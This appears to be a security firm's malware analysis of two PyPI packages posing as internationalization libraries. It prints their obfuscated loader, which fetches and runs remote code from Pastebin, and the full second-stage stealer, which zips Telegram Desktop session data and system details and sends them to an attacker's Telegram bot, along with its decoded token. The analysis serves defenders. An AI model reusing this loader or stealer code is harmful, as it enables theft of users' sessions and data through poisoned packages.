Obfuscated PyPI Packages Purporting to be i18n Libraries Actually Stealing Telegram Data
Phylum discovered two packages published to PyPI on October 28 that claim to be libraries for simplifying internationalization. The files were highly obfuscated and upon further inspection were found to contain malicious code designed to steal sensitive Telegram Desktop application data and system information, which it then sends to an attacker-controlled Telegram channel.
--cta--
Overview
The packages in question are called localization-utils
and locute
. localization-utils
was published first and went through four iterations over ~30 minutes. A few hours later the locute
package was published and went through five iterations over ~90 minutes. The changes across version releases were minimal and seemed mostly to do with trying to get the MEMORY_OFFSET
constant imported correctly (more on this later). In both packages, the obfuscated code ends up pulling a non-obfuscated final malicious payload from a remote Pastebin URL that is dynamically executed.
The Obfuscated Code
In both packages the file that contains the obfuscated code is called inset.py
. Here is its contents:
from .utils_p.memory_normalizer import P1 as MEMORY_OFFSET
M = 0x18C
DEFAULT_LOCALE = "en"
globe = globals
_ = "".join
__ = getattr(globe()[_([chr(______) for ______ in [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]])], _([chr(______) for ______ in [103, 101, 116, 97, 116, 116, 114]]))
___ = getattr(globe()[_([chr(______) for ______ in [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]])], _([chr(______) for ______ in [95, 95, 105, 109, 112, 111, 114, 116, 95, 95]]))
____ = getattr(globe()[_([chr(______) for ______ in [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]])], _([chr(______) for ______ in [99, 104, 114]]))
def __get_kernel_ato32_locale_driver():
__api = ___(_([____(x) for x in MEMORY_OFFSETS[:M ^ ((1 << 8) + (1 << 7) + (1 << 1))]]))
__addr = __(__api.request, _([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 1)):M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 3) + (1 << 0))]]))(_([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 2)):]])).read()
__(globe()[_([chr(______) for ______ in [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]])], _([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 3) + (1 << 0)):M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 2) + (1 << 0))]]))(__addr)
def __exexute_offset_moving():
__kernel_api = ___(_([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 2) + (1 << 0)):M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 3) + (1 << 2) + (1 << 1))]]))
__excutor = __(__kernel_api, _([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 3) + (1 << 2) + (1 << 1)):M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 2))]]))
__excutor(target=__get_kernel_ato32_locale_driver).start()
__exexute_offset_moving()
First, it’s interesting to see the attacker goes through the effort of trying to disguise this file to look like low-level memory or kernel interaction code or something of that nature. Second, there’s a variety of obfuscation techniques present here; we see a combination of character obfuscation, dynamic function calls, and bitwise operations.
Notice the first line of this file imports what seems like a necessary memory offset constant from a “memory normalizer” utility (whatever that might be?) however, if we pull this thread what we’ll find is a bit of attempted import misdirection. Taking a look in memory_normalizar/__init__.py
we’ll find the following:
from .headers import P1
__all__ = (
"P1",
)
Looks innocuous enough, but let’s peek in memory_normalizer/headers.py
. That file contains only a long list of integers:
P1 = [117, 114, 108, 108, 105, 98, 46, 114, 101, 113, 117, 101, 115, 116, 117, 114, 108, 111, 112, 101, 110, 101, 120, 101, 99, 116, 104, 114, 101, 97, 100, 105, 110, 103, 84, 104, 114, 101, 97, 100, 104, 116, 116, 112, 115, 58, 47, 47, 112, 97, 115, 116, 101, 98, 105, 110, 46, 99, 111, 109, 47, 114, 97, 119, 47, 87, 78, 114, 97, 106, 97, 86, 75]
By itself, this might seem like legitimate code in required and necessary files of an organized package, but let’s go back to inset.py
knowing now that we’re importing this long list of integers into the variable MEMORY_OFFSETS
. We first find reference to MEMORY_OFFSETS
in the __api
variable definition:
__api = ___(_([____(x) for x in MEMORY_OFFSETS[:M ^ ((1 << 8) + (1 << 7) + (1 << 1))]]))
The attacker uses a complex combination of slicing, bitwise operations, and dynamic function invocation to obscure what’s really going on here. Given the underscore variables defined earlier in the code:
_
is set to"".join
, a function to concatenate lists of strings.__
is an alias forgetattr
, a function to access an attribute of an object.___
is an alias for__import__
, a function to import modules during runtime.____
is an alias forchr
, a function to convert ASCII codes to characters.
we can evaluate the code defining __api
to see that it is aliasing urllib
. The next line defines __addr
which, now knowing that __api
is really urllib
, is using the request
method to a fetch something from a remote URL. Let’s quickly work through what URL is being dynamically generated here:
MEMORY_OFFSETS[:M ^ ((1 << 8) + (1 << 7) + (1 << 1))]
:- This slice operation decodes to
urlib.request
. - The bitwise operation
M ^ ((1 << 8) + (1 << 7) + (1 << 1))
calculates the end index of the slice. M
is defined earlier as0x18C
, which is396
in decimal. The bitwise operation results in283
, so the slice operation is equivalent toMEMORY_OFFSETS[:283]
.
- This slice operation decodes to
MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 1)):M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 3) + (1 << 0))]
:- This slice decodes to
urlopen
, a function in theurllib.request
module for opening URLs. - The slice is computed using bitwise operations, similar to the previous slice.
- This slice decodes to
MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 2)):]
:- This slice decodes to the URL
https://pastebin.com/raw/WNrajaVK
, which is the target of the HTTP request.
- This slice decodes to the URL
Let’s navigate there and figure out what’s getting pulled from that URL. Here’s the code found there:
# <https://pastebin.com/WNrajaVK>
import json
import os
import platform
import socket
import subprocess
import time
import zipfile
from pathlib import Path
import requests
CHAT_ID = "-1002009496950"
TOKEN = "".join([chr(________________ ^ 257) for ________________ in [311, 312, 306, 308, 309, 305, 308, 311, 308, 305, 315, 320, 320, 324, 358, 330, 335, 376, 372, 343, 347, 375, 357, 373, 332, 344, 341, 352, 365, 366, 356, 305, 300, 331, 306, 379, 306, 365, 305, 360, 305, 361, 324, 375, 333, 324]])
def send_message(message_text):
global TOKEN, CHAT_ID, requests
base_url = f"<https://api.telegram.org/bot{TOKEN}/sendMessage>"
requests.get(base_url, data={"text": message_text, "chat_id": CHAT_ID})
def send_file(file_path):
global TOKEN, CHAT_ID, requests
url = f"<https://api.telegram.org/bot{TOKEN}/sendDocument>"
requests.post(
url, data={"chat_id": CHAT_ID}, files={"document": open(file_path, "rb")}
)
def get_system_report():
global platform, socket, json, requests
info = {}
info["platform"] = platform.uname()
info["platform-release"] = platform.release()
info["platform-version"] = platform.version()
info["architecture"] = platform.machine()
info["hostname"] = socket.gethostname()
info["ip-address"] = requests.get("<http://api.ipify.org/>").text
info["processor"] = platform.processor()
return json.dumps(info, indent=4)
system = platform.system()
if system == "Linux":
tdata_dir = ".local/share/TelegramDesktop/tdata/"
else:
tdata_dir = "AppData/Roaming/Telegram Desktop/tdata"
tdata_dir = Path.home() / Path(tdata_dir)
try:
send_message(f"TARGET: '''{get_system_report()}'''")
if tdata_dir.is_dir():
subprocess.call(
["taskkill", "/f", "/im", "Telegram.exe"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
time.sleep(0.5)
name = ""
with open("debug.zip", "wb") as tmp:
zf = zipfile.ZipFile(tmp, "w")
for path in tdata_dir.rglob("*"):
if path.is_file():
if os.stat(path).st_size < 10 * 1024:
zf.write(path.absolute(), path)
zf.close()
name = tmp.name
send_message(f"TG FOUND!!\\n{system}")
send_file(name)
os.remove(name)
else:
message_text = send_message(f"ERROR TG NOT FOUND!!\\n{system} {tdata_dir}")
except Exception as e:
pass
Aside from the Telegram Bot Token, nothing in this file is obfuscated so it’s fairly easy to see what’s going on here. The code is designed to:
- Collect system information such as platform, architecture, hostname, and IP address.
- Search for Telegram Desktop application data and compress it into a zip file.
- Send the system information and compressed Telegram Desktop data to an attacker-controlled Telegram channel.
For reference, the Telegram Bot Token, obfuscated using a similar ASCII character obfuscation technique as seen in the local files, evaluates to: 6935405650:AAEgKNyuVZvdtMYTaloe0-J3z3l0i0hEvLE
.
A Note About the MEMORY_OFFSET
Import
As mentioned earlier, the first line of inset.py
defines the import
from .utils_p.memory_normalizer import P1 as MEMORY_OFFSET
However, if you pay close attention you’ll notice that the references in the rest of the code to this variable contain an “S” at the end. E.g.
__api = ___(_([____(x) for x in MEMORY_OFFSETS[:M ^ ((1 << 8) + (1 << 7) + (1 << 1))]]))
Also mentioned earlier, our diff analyzer indicates that the only diffs between versions of localization_utils
are around this import statement. Presumably this was the attacker trying to figure out why the code wasn’t working during their testing. With all the obfuscation and import misdirection it appears they simply didn’t notice a typo in the code. The code after the import references MEMORY_OFFSETS
with an “S” on the end, while the import does not contain the extra “S”. This would result in a NameError
at runtime and the diffs we’re seeing are most likely the attacker trying to debug this.
Conclusion
These packages show a dedicated and elaborate effort to avoid detection via static analysis and visual inspection by employing a variety of obfuscation techniques. The code initiates a series of actions that involve importing modules and functions dynamically, constructing a URL, fetching additional code, and executing it, with the end goal of stealing sensitive telegram data. These packages serve as yet another stark reminder of the critical nature of dependency trust in our open source ecosystems. Given the extensive obfuscation and the intent to mislead present in these packages, there is a substantial risk that such a package might go unnoticed even during a cursory visual inspection.